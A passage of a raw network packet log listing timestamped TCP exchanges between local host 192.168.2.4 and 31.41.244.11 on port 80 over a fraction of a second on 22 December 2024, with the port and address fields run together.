                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.042870045 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.044025898 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.044080973 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.044143915 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.044223070 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.045391083 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.045447111 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.045526981 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.045579910 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.163644075 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.163697004 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.163708925 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.163744926 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.164880991 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.164917946 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.164936066 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.164999962 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.283236027 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.283380985 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.283385038 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.283441067 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.284312010 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.284348011 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.284374952 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.284408092 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.402754068 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.402806997 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.402837992 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.402864933 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.402903080 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.402906895 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.402906895 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.402947903 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.402956009 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403007030 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403017998 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403053999 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403065920 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403090954 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403105021 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403127909 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403140068 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403163910 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403171062 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403199911 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403213024 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403238058 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403243065 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403283119 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403872967 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403911114 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403928041 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403944969 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403959990 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403980970 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.403990984 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.404017925 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.404020071 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.404063940 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.404675961 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.404730082 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.404730082 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.404767036 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.404776096 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.404802084 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.404809952 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.404835939 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.404849052 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.404872894 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.404879093 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.404911995 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.405522108 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.405575991 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.405580044 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.405616045 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.405627012 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.405649900 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.405662060 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.405684948 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.405692101 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.405726910 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.406485081 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.406519890 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.406533957 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.406553984 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.406555891 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.406589031 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.406595945 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.406622887 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.406666040 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.406678915 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.406711102 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.406719923 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.407294035 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.407331944 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.407346964 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.407381058 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.407388926 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.407418013 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.407422066 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.407454014 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.407459974 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.407495022 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.408107996 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.408142090 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.408154011 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.408185959 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.409363031 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.409399986 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.409415960 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.409435987 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.409444094 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.409471035 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.409471989 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.409507036 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.409518003 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.409543037 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.409548998 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.409584999 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.410198927 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.410233974 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.410243988 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.410271883 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.410271883 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.410306931 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.410319090 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.410341978 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.410352945 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.410382032 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.411077976 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.411112070 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.411123991 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.411147118 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.411158085 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.411190033 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.411206961 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.411241055 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.411252022 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.411277056 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.411283016 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.411324978 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.411925077 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.411971092 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.412045956 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.412095070 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.412766933 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.412802935 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.412821054 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.412838936 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.412857056 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.412873030 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.412879944 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.412906885 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.412924051 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.412944078 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.412959099 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.412997007 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.413670063 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.413721085 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.414537907 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.414572954 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.414591074 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.414608955 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.414622068 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.414661884 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.415361881 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.415397882 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.415421963 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.415433884 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.415451050 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.415471077 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.415479898 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.415505886 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.415515900 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.415556908 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.416188002 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.416224003 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.416249990 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.416258097 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.416269064 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.416292906 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.416312933 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.416327000 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.416349888 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.416363001 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.416374922 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.416414022 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.417009115 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.417062998 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.417063951 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.417099953 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.417118073 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.417140961 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.417155027 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.417190075 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.417202950 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.417227983 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.417237997 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.417279005 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.417898893 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.417934895 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.417951107 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.417970896 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.417989016 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.418009996 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.418021917 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.418045998 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.418061018 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.418096066 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.418669939 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.418720961 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.418725014 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.418761015 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.418775082 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.418797016 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.418808937 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.418832064 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.418852091 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.418869972 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.418876886 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.418926954 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.419636965 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.419672012 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.419692993 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.419707060 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.419728994 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.419742107 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.419763088 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.419780970 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.419800997 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.419825077 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.420489073 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.420525074 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.420542002 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.420562029 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.420579910 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.420603991 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.420615911 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.420650005 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.420660973 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.420685053 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.420711994 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.420737028 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.421261072 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.421312094 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.421320915 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.421356916 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.421370029 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.421392918 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.421408892 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.421427965 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.421447039 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.421468973 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.422183037 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.422219038 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.422234058 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.422254086 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.422270060 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.422348022 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.422357082 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.422383070 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.422400951 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.422419071 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.422435045 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.422467947 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.422980070 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.423037052 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.423057079 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.423091888 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.423125982 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.423145056 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.423145056 CET4976580192.168.2.431.41.244.11
